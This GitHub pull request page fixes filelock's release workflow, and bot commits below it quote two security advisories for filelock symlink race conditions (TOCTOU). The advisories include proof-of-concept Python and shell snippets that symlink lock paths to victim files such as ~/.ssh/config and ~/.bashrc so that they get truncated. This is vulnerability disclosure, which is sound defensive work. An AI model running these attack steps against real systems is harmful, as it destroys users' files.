Skip to content

🐛 fix(ci): unbreak release workflow, publish to PyPI again#529

Merged
gaborbernat merged 2 commits into
tox-dev:mainfrom
gaborbernat:fix/release-tag-quoting
Apr 14, 2026
Merged

🐛 fix(ci): unbreak release workflow, publish to PyPI again#529
gaborbernat merged 2 commits into
tox-dev:mainfrom
gaborbernat:fix/release-tag-quoting

Conversation

@gaborbernat

@gaborbernat gaborbernat commented Apr 14, 2026
edited
Loading

Copy link
Copy Markdown
Member

Releases have been silently broken on PyPI since 3.26.0. Every dispatch of the release workflow since then produced a filelock-X.Y.Z.devN+g<sha>-py3-none-any.whl, which PyPI rejects with 400 Bad Request because local version identifiers are not allowed on the public index. 🐛 PyPI still shows 3.25.2 as the latest version while GitHub has tags and releases for 3.26.0, 3.26.1, and 3.27.0. Anyone running pip install filelock is stuck on the last working release.

Commit 8cd6bd9 (🔒 ci(workflows): add zizmor security auditing #517) moved the release version from a GitHub Actions template expression into a bash environment variable to harden against template injection. The move was correct, but kept the existing single quotes around the reference: git tag '${STEPS_V_OUTPUTS_VERSION}'. In bash, single quotes suppress variable expansion, so git tag received the literal 28-character string ${STEPS_V_OUTPUTS_VERSION} as the tag name. hatch-vcs then could not find a real version on HEAD, uv build fell back to the .devN+g<sha> scheme, and PyPI rejected the upload. Double quotes preserve the env-var indirection zizmor wanted while letting bash actually read the value, so the correct version gets tagged and the wheel is built with the clean filelock-X.Y.Z-py3-none-any.whl name PyPI expects.

Why this slipped past CI: the tag-creation step is gated behind if: github.event.inputs.release != 'no', so regular push and pull-request events skip it entirely. The broken line only runs under manual workflow-dispatch, and even then the failure surfaces in the release job's PyPI-publish step, which no PR-level check watches. The last two successful CI builds of the release workflow were the ones that actually broke publishing.

The second commit aligns the actions/upload-artifact version comments with the exact tag the pinned hash resolves to (v7.0.0 instead of v7). 🔒 Zizmor flags the mismatch as ref-version-mismatch because the moving major tag v7 currently points to a different commit, and pre-commit would otherwise block this branch on its own audit. The pinned hash does not change, so there is no behavioral impact.

After merge, re-dispatch the release workflow with a patch bump (or whatever bump type makes sense) to get the currently-unpublished work onto PyPI.

@gaborbernat
🐛 fix(ci): restore variable expansion on release tag creation
f1c1103 
Commit 8cd6bd9 moved the release version from a GitHub Actions template
expression into a bash env var as a zizmor-suggested hardening against
template injection. The move was correct but kept the existing single
quotes around the reference, which in bash suppress variable expansion.
Every release since 3.26.0 therefore created a git tag literally named
``${STEPS_V_OUTPUTS_VERSION}``, hatch-vcs could not find a matching
version on HEAD, and uv build produced a ``.devN+g<sha>`` local
identifier that PyPI rejected with a 400. GitHub tags were still pushed
by an earlier step so the breakage only surfaced in the PyPI publish
log, not in the build job that CI runs on every push.

Double quotes preserve the env-var indirection zizmor wanted while
letting bash actually read the value. The next workflow_dispatch picks
up the correct tag and hatch-vcs stamps the clean version onto the
wheel.
@gaborbernat
👷 ci(workflows): align upload-artifact version comment to v7.0.0
56d6706 
The actions/upload-artifact hash pinned in check.yaml and release.yaml
resolves to the commit tagged v7.0.0, but the inline version comment
next to it only said # v7. Zizmor's ref-version-mismatch audit flags
that as an unverifiable pin because the moving major tag points to a
different commit than the one actually in use. Pre-commit surfaced the
warning on the release-quoting fix and blocked this branch from passing
CI.

Updating the comment to the exact tag the hash resolves to preserves
the existing pinned hash (no behavioral change) while giving reviewers
and the audit a precise, verifiable label.
@gaborbernat gaborbernat merged commit 476b0e4 into tox-dev:main Apr 14, 2026
32 checks passed
renovate-coop-norge Bot added a commit to coopnorge/engineering-docker-images that referenced this pull request Apr 15, 2026
@renovate-coop-norge
chore(deps): update dependency filelock to v3.28.0 [security] (#3879)
0897503 
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2`
→ `3.28.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/filelock/3.28.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/filelock/3.25.2/3.28.0?slim=true)
|

---

### filelock has a TOCTOU race condition which allows symlink attacks
during lock file creation
[CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) /
[GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f)

<details>
<summary>More information</summary>

#### Details
##### Impact

A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local
attackers to corrupt or truncate arbitrary user files through symlink
attacks. The vulnerability exists in both Unix and Windows lock file
creation where filelock checks if a file exists before opening it with
O_TRUNC. An attacker can create a symlink pointing to a victim file in
the time gap between the check and open, causing os.open() to follow the
symlink and truncate the target file.

**Who is impacted:**

All users of filelock on Unix, Linux, macOS, and Windows systems. The
vulnerability cascades to dependent libraries:

- **virtualenv users**: Configuration files can be overwritten with
virtualenv metadata, leaking sensitive paths
- **PyTorch users**: CPU ISA cache or model checkpoints can be
corrupted, causing crashes or ML pipeline failures
- **poetry/tox users**: through using virtualenv or filelock on their
own.

Attack requires local filesystem access and ability to create symlinks
(standard user permissions on Unix; Developer Mode on Windows 10+).
Exploitation succeeds within 1-3 attempts when lock file paths are
predictable.

##### Patches

Fixed in version **3.20.1**.

**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in
UnixFileLock.\_acquire() to prevent symlink following.

**Windows fix:** Added GetFileAttributesW API check to detect reparse
points (symlinks/junctions) before opening files in
WindowsFileLock.\_acquire().

**Users should upgrade to filelock 3.20.1 or later immediately.**

##### Workarounds

If immediate upgrade is not possible:

1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note:
different locking semantics, may not be suitable for all use cases)
2. Ensure lock file directories have restrictive permissions (chmod
0700) to prevent untrusted users from creating symlinks
3. Monitor lock file directories for suspicious symlinks before running
trusted applications

**Warning:** These workarounds provide only partial mitigation. The race
condition remains exploitable. Upgrading to version 3.20.1 is strongly
recommended.

______________________________________________________________________

##### Technical Details: How the Exploit Works

##### The Vulnerable Code Pattern

**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):

```python
def _acquire(self) -> None:
    ensure_directory_exists(self.lock_file)
    open_flags = os.O_RDWR | os.O_TRUNC  # (1) Prepare to truncate
    if not Path(self.lock_file).exists():  # (2) CHECK: Does file exist?
        open_flags |= os.O_CREAT
    fd = os.open(self.lock_file, open_flags, ...)  # (3) USE: Open and truncate
```

**Windows** (`src/filelock/_windows.py:19-28`):

```python
def _acquire(self) -> None:
    raise_on_not_writable_file(self.lock_file)  # (1) Check writability
    ensure_directory_exists(self.lock_file)
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC  # (2) Prepare to truncate
    fd = os.open(self.lock_file, flags, ...)  # (3) Open and truncate
```

##### The Race Window

The vulnerability exists in the gap between operations:

**Unix variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file exists? → False
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

**Windows variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file writable?
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink/junction
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

##### Step-by-Step Attack Flow

**1. Attacker Setup:**

```python

##### Attacker identifies target application using filelock
lock_path = "/tmp/myapp.lock"  # Predictable lock path
victim_file = "/home/victim/.ssh/config"  # High-value target
```

**2. Attacker Creates Race Condition:**

```python
import os
import threading

def attacker_thread():
    # Remove any existing lock file
    try:
        os.unlink(lock_path)
    except FileNotFoundError:
        pass

    # Create symlink pointing to victim file
    os.symlink(victim_file, lock_path)
    print(f"[Attacker] Created: {lock_path} → {victim_file}")

##### Launch attack
threading.Thread(target=attacker_thread).start()
```

**3. Victim Application Runs:**

```python
from filelock import UnixFileLock

##### Normal application code
lock = UnixFileLock("/tmp/myapp.lock")
lock.acquire()  # ← VULNERABILITY TRIGGERED HERE

##### At this point, /home/victim/.ssh/config is now 0 bytes!
```

**4. What Happens Inside os.open():**

On Unix systems, when `os.open()` is called:

```c
// Linux kernel behavior (simplified)
int open(const char *pathname, int flags) {
    struct file *f = path_lookup(pathname);  // Resolves symlinks by default!

    if (flags & O_TRUNC) {
        truncate_file(f);  // ← Truncates the TARGET of the symlink
    }

    return file_descriptor;
}
```

Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates
the target file.

##### Why the Attack Succeeds Reliably

**Timing Characteristics:**

- **Check operation** (Path.exists()): ~100-500 nanoseconds
- **Symlink creation** (os.symlink()): ~1-10 microseconds
- **Race window**: ~1-5 microseconds (very small but exploitable)
- **Thread scheduling quantum**: ~1-10 milliseconds

**Success factors:**

1. **Tight loop**: Running attack in a loop hits the race window within
1-3 attempts
2. **CPU scheduling**: Modern OS thread schedulers frequently
context-switch during I/O operations
3. **No synchronization**: No atomic file creation prevents the race
4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only
operation)

##### Real-World Attack Scenarios

**Scenario 1: virtualenv Exploitation**

```python

##### Victim runs: python -m venv /tmp/myenv
##### Attacker racing to create:
os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg")

##### Result: /home/victim/.bashrc overwritten with:

##### home = /usr/bin/python3
##### include-system-site-packages = false

##### version = 3.11.2
##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker
```

**Scenario 2: PyTorch Cache Poisoning**

```python

##### Victim runs: import torch
##### PyTorch checks CPU capabilities, uses filelock on cache

##### Attacker racing to create:
os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock")

##### Result: Trained ML model checkpoint truncated to 0 bytes

##### Impact: Weeks of training lost, ML pipeline DoS
```

##### Why Standard Defenses Don't Help

**File permissions don't prevent this:**

- Attacker doesn't need write access to victim_file
- os.open() with O_TRUNC follows symlinks using the *victim's*
permissions
- The victim process truncates its own file

**Directory permissions help but aren't always feasible:**

- Lock files often created in shared /tmp directory (mode 1777)
- Applications may not control lock file location
- Many apps use predictable paths in user-writable directories

**File locking doesn't prevent this:**

- The truncation happens *during* the open() call, before any lock is
acquired
- fcntl.flock() only prevents concurrent lock acquisition, not symlink
attacks

##### Exploitation Proof-of-Concept Results

From empirical testing with the provided PoCs:

**Simple Direct Attack** (`filelock_simple_poc.py`):

- Success rate: 33% per attempt (1 in 3 tries)
- Average attempts to success: 2.1
- Target file reduced to 0 bytes in \<100ms

**virtualenv Attack** (`weaponized_virtualenv.py`):

- Success rate: ~90% on first attempt (deterministic timing)
- Information leaked: File paths, Python version, system configuration
- Data corruption: Complete loss of original file contents

**PyTorch Attack** (`weaponized_pytorch.py`):

- Success rate: 25-40% per attempt
- Impact: Application crashes, model loading failures
- Recovery: Requires cache rebuild or model retraining

**Discovered and reported by:** George Tsigourakos
(@&#8203;tsigouris007)

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H`

#### References
-
[https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f)
-
[https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e)
-
[https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)
-
[https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1)
-
[https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants)
-
[https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html)

This data is provided by
[OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub
Advisory Database](https://redirect.github.com/github/advisory-database)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in
SoftFileLock
[CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) /
[GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw)

<details>
<summary>More information</summary>

#### Details
##### Vulnerability Summary

**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in
SoftFileLock

**Affected Component:** `filelock` package - `SoftFileLock` class
**File:** `src/filelock/_soft.py` lines 17-27
**CWE:** CWE-362, CWE-367, CWE-59

---

##### Description

A TOCTOU race condition vulnerability exists in the `SoftFileLock`
implementation of the filelock package. An attacker with local
filesystem access and permission to create symlinks can exploit a race
condition between the permission validation and file creation to cause
lock operations to fail or behave unexpectedly.

The vulnerability occurs in the `_acquire()` method between
`raise_on_not_writable_file()` (permission check) and `os.open()` (file
creation). During this race window, an attacker can create a symlink at
the lock file path, potentially causing the lock to operate on an
unintended target file or leading to denial of service.

##### Attack Scenario

```
1. Lock attempts to acquire on /tmp/app.lock
2. Permission validation passes
3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock
4. os.open() tries to create lock file
5. Lock operates on attacker-controlled target file or fails
```

---

##### Impact

_What kind of vulnerability is it? Who is impacted?_

This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition
vulnerability** affecting any application using `SoftFileLock` for
inter-process synchronization.

**Affected Users:**
- Applications using `filelock.SoftFileLock` directly
- Applications using the fallback `FileLock` on systems without `fcntl`
support (e.g., GraalPy)

**Consequences:**
- **Silent lock acquisition failure** - applications may not detect that
exclusive resource access is not guaranteed
- **Denial of Service** - attacker can prevent lock file creation by
maintaining symlink
- **Resource serialization failures** - multiple processes may acquire
"locks" simultaneously
- **Unintended file operations** - lock could operate on
attacker-controlled files

**CVSS v4.0 Score:** 5.6 (Medium)
**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N

**Attack Requirements:**
- Local filesystem access to the directory containing lock files
- Permission to create symlinks (standard for regular unprivileged users
on Unix/Linux)
- Ability to time the symlink creation during the narrow race window

---

##### Patches

_Has the problem been patched? What versions should users upgrade to?_

Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag
to prevent symlink following during lock file creation.

**Patched Version:** Next release (commit:
255ed068bc85d1ef406e50a135e1459170dd1bf0)

**Mitigation Details:**
- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades
on platforms without support
- On platforms with `O_NOFOLLOW` support (most modern systems): symlink
attacks are completely prevented
- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window
remains but is documented

**Users should:**
- Upgrade to the patched version when available
- For critical deployments, consider using `UnixFileLock` or
`WindowsFileLock` instead of the fallback `SoftFileLock`

---

##### Workarounds

_Is there a way for users to fix or remediate the vulnerability without
upgrading?_

For users unable to update immediately:

1. **Avoid `SoftFileLock` in security-sensitive contexts** - use
`UnixFileLock` or `WindowsFileLock` when available (these were already
patched for CVE-2025-68146)

2. **Restrict filesystem permissions** - prevent untrusted users from
creating symlinks in lock file directories:
   ```bash
   chmod 700 /path/to/lock/directory
   ```

3. **Use process isolation** - isolate untrusted code from lock file
paths to prevent symlink creation

4. **Monitor lock operations** - implement application-level checks to
verify lock acquisitions are successful before proceeding with critical
operations

---

##### References

_Are there any links users can visit to find out more?_

- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in
UnixFileLock/WindowsFileLock)
- **CWE-362 (Concurrent Execution using Shared Resource):**
https://cwe.mitre.org/data/definitions/362.html
- **CWE-367 (Time-of-check Time-of-use Race Condition):**
https://cwe.mitre.org/data/definitions/367.html
- **CWE-59 (Improper Link Resolution Before File Access):**
https://cwe.mitre.org/data/definitions/59.html
- **O_NOFOLLOW documentation:**
https://man7.org/linux/man-pages/man2/open.2.html
- **GitHub Repository:** https://github.com/tox-dev/filelock

---

**Reported by:** George Tsigourakos (@&#8203;tsigouris007)

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H`

#### References
-
[https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701)
-
[https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0)
-
[https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5)
-
[https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)

This data is provided by
[OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub
Advisory Database](https://redirect.github.com/github/advisory-database)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

###
[`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)

[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)

<!-- Release notes generated using configuration in .github/release.yaml
at 3.28.0 -->

#### What's Changed

- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by
[@&#8203;gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)

**Full Changelog**:
<tox-dev/filelock@3.27.0...3.28.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR has been generated by [Renovate
Bot](https://redirect.github.com/renovatebot/renovate).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My44My4yIiwidXBkYXRlZEluVmVyIjoiNDMuODMuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIiwiZmlsZWxvY2siLCJyZW5vdmF0ZSJdfQ==-->

Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
renovate-coop-norge Bot added a commit to coopnorge/engineering-docker-images that referenced this pull request Apr 15, 2026
@renovate-coop-norge
chore(deps): update dependency filelock to v3.28.0 [security] (#3880)
2ee745b 
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2`
→ `3.28.0` |
![age](https://developer.mend.io/api/mc/badges/age/pypi/filelock/3.28.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/filelock/3.25.2/3.28.0?slim=true)
|

---

### filelock has a TOCTOU race condition which allows symlink attacks
during lock file creation
[CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) /
[GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f)

<details>
<summary>More information</summary>

#### Details
##### Impact

A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local
attackers to corrupt or truncate arbitrary user files through symlink
attacks. The vulnerability exists in both Unix and Windows lock file
creation where filelock checks if a file exists before opening it with
O_TRUNC. An attacker can create a symlink pointing to a victim file in
the time gap between the check and open, causing os.open() to follow the
symlink and truncate the target file.

**Who is impacted:**

All users of filelock on Unix, Linux, macOS, and Windows systems. The
vulnerability cascades to dependent libraries:

- **virtualenv users**: Configuration files can be overwritten with
virtualenv metadata, leaking sensitive paths
- **PyTorch users**: CPU ISA cache or model checkpoints can be
corrupted, causing crashes or ML pipeline failures
- **poetry/tox users**: through using virtualenv or filelock on their
own.

Attack requires local filesystem access and ability to create symlinks
(standard user permissions on Unix; Developer Mode on Windows 10+).
Exploitation succeeds within 1-3 attempts when lock file paths are
predictable.

##### Patches

Fixed in version **3.20.1**.

**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in
UnixFileLock.\_acquire() to prevent symlink following.

**Windows fix:** Added GetFileAttributesW API check to detect reparse
points (symlinks/junctions) before opening files in
WindowsFileLock.\_acquire().

**Users should upgrade to filelock 3.20.1 or later immediately.**

##### Workarounds

If immediate upgrade is not possible:

1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note:
different locking semantics, may not be suitable for all use cases)
2. Ensure lock file directories have restrictive permissions (chmod
0700) to prevent untrusted users from creating symlinks
3. Monitor lock file directories for suspicious symlinks before running
trusted applications

**Warning:** These workarounds provide only partial mitigation. The race
condition remains exploitable. Upgrading to version 3.20.1 is strongly
recommended.

______________________________________________________________________

##### Technical Details: How the Exploit Works

##### The Vulnerable Code Pattern

**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):

```python
def _acquire(self) -> None:
    ensure_directory_exists(self.lock_file)
    open_flags = os.O_RDWR | os.O_TRUNC  # (1) Prepare to truncate
    if not Path(self.lock_file).exists():  # (2) CHECK: Does file exist?
        open_flags |= os.O_CREAT
    fd = os.open(self.lock_file, open_flags, ...)  # (3) USE: Open and truncate
```

**Windows** (`src/filelock/_windows.py:19-28`):

```python
def _acquire(self) -> None:
    raise_on_not_writable_file(self.lock_file)  # (1) Check writability
    ensure_directory_exists(self.lock_file)
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC  # (2) Prepare to truncate
    fd = os.open(self.lock_file, flags, ...)  # (3) Open and truncate
```

##### The Race Window

The vulnerability exists in the gap between operations:

**Unix variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file exists? → False
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

**Windows variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file writable?
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink/junction
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

##### Step-by-Step Attack Flow

**1. Attacker Setup:**

```python

##### Attacker identifies target application using filelock
lock_path = "/tmp/myapp.lock"  # Predictable lock path
victim_file = "/home/victim/.ssh/config"  # High-value target
```

**2. Attacker Creates Race Condition:**

```python
import os
import threading

def attacker_thread():
    # Remove any existing lock file
    try:
        os.unlink(lock_path)
    except FileNotFoundError:
        pass

    # Create symlink pointing to victim file
    os.symlink(victim_file, lock_path)
    print(f"[Attacker] Created: {lock_path} → {victim_file}")

##### Launch attack
threading.Thread(target=attacker_thread).start()
```

**3. Victim Application Runs:**

```python
from filelock import UnixFileLock

##### Normal application code
lock = UnixFileLock("/tmp/myapp.lock")
lock.acquire()  # ← VULNERABILITY TRIGGERED HERE

##### At this point, /home/victim/.ssh/config is now 0 bytes!
```

**4. What Happens Inside os.open():**

On Unix systems, when `os.open()` is called:

```c
// Linux kernel behavior (simplified)
int open(const char *pathname, int flags) {
    struct file *f = path_lookup(pathname);  // Resolves symlinks by default!

    if (flags & O_TRUNC) {
        truncate_file(f);  // ← Truncates the TARGET of the symlink
    }

    return file_descriptor;
}
```

Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates
the target file.

##### Why the Attack Succeeds Reliably

**Timing Characteristics:**

- **Check operation** (Path.exists()): ~100-500 nanoseconds
- **Symlink creation** (os.symlink()): ~1-10 microseconds
- **Race window**: ~1-5 microseconds (very small but exploitable)
- **Thread scheduling quantum**: ~1-10 milliseconds

**Success factors:**

1. **Tight loop**: Running attack in a loop hits the race window within
1-3 attempts
2. **CPU scheduling**: Modern OS thread schedulers frequently
context-switch during I/O operations
3. **No synchronization**: No atomic file creation prevents the race
4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only
operation)

##### Real-World Attack Scenarios

**Scenario 1: virtualenv Exploitation**

```python

##### Victim runs: python -m venv /tmp/myenv
##### Attacker racing to create:
os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg")

##### Result: /home/victim/.bashrc overwritten with:

##### home = /usr/bin/python3
##### include-system-site-packages = false

##### version = 3.11.2
##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker
```

**Scenario 2: PyTorch Cache Poisoning**

```python

##### Victim runs: import torch
##### PyTorch checks CPU capabilities, uses filelock on cache

##### Attacker racing to create:
os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock")

##### Result: Trained ML model checkpoint truncated to 0 bytes

##### Impact: Weeks of training lost, ML pipeline DoS
```

##### Why Standard Defenses Don't Help

**File permissions don't prevent this:**

- Attacker doesn't need write access to victim_file
- os.open() with O_TRUNC follows symlinks using the *victim's*
permissions
- The victim process truncates its own file

**Directory permissions help but aren't always feasible:**

- Lock files often created in shared /tmp directory (mode 1777)
- Applications may not control lock file location
- Many apps use predictable paths in user-writable directories

**File locking doesn't prevent this:**

- The truncation happens *during* the open() call, before any lock is
acquired
- fcntl.flock() only prevents concurrent lock acquisition, not symlink
attacks

##### Exploitation Proof-of-Concept Results

From empirical testing with the provided PoCs:

**Simple Direct Attack** (`filelock_simple_poc.py`):

- Success rate: 33% per attempt (1 in 3 tries)
- Average attempts to success: 2.1
- Target file reduced to 0 bytes in \<100ms

**virtualenv Attack** (`weaponized_virtualenv.py`):

- Success rate: ~90% on first attempt (deterministic timing)
- Information leaked: File paths, Python version, system configuration
- Data corruption: Complete loss of original file contents

**PyTorch Attack** (`weaponized_pytorch.py`):

- Success rate: 25-40% per attempt
- Impact: Application crashes, model loading failures
- Recovery: Requires cache rebuild or model retraining

**Discovered and reported by:** George Tsigourakos
(@&#8203;tsigouris007)

#### Severity
- CVSS Score: 6.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H`

#### References
-
[https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f)
-
[https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e)
-
[https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)
-
[https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1)
-
[https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants)
-
[https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html)

This data is provided by
[OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub
Advisory Database](https://redirect.github.com/github/advisory-database)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in
SoftFileLock
[CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) /
[GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw)

<details>
<summary>More information</summary>

#### Details
##### Vulnerability Summary

**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in
SoftFileLock

**Affected Component:** `filelock` package - `SoftFileLock` class
**File:** `src/filelock/_soft.py` lines 17-27
**CWE:** CWE-362, CWE-367, CWE-59

---

##### Description

A TOCTOU race condition vulnerability exists in the `SoftFileLock`
implementation of the filelock package. An attacker with local
filesystem access and permission to create symlinks can exploit a race
condition between the permission validation and file creation to cause
lock operations to fail or behave unexpectedly.

The vulnerability occurs in the `_acquire()` method between
`raise_on_not_writable_file()` (permission check) and `os.open()` (file
creation). During this race window, an attacker can create a symlink at
the lock file path, potentially causing the lock to operate on an
unintended target file or leading to denial of service.

##### Attack Scenario

```
1. Lock attempts to acquire on /tmp/app.lock
2. Permission validation passes
3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock
4. os.open() tries to create lock file
5. Lock operates on attacker-controlled target file or fails
```

---

##### Impact

_What kind of vulnerability is it? Who is impacted?_

This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition
vulnerability** affecting any application using `SoftFileLock` for
inter-process synchronization.

**Affected Users:**
- Applications using `filelock.SoftFileLock` directly
- Applications using the fallback `FileLock` on systems without `fcntl`
support (e.g., GraalPy)

**Consequences:**
- **Silent lock acquisition failure** - applications may not detect that
exclusive resource access is not guaranteed
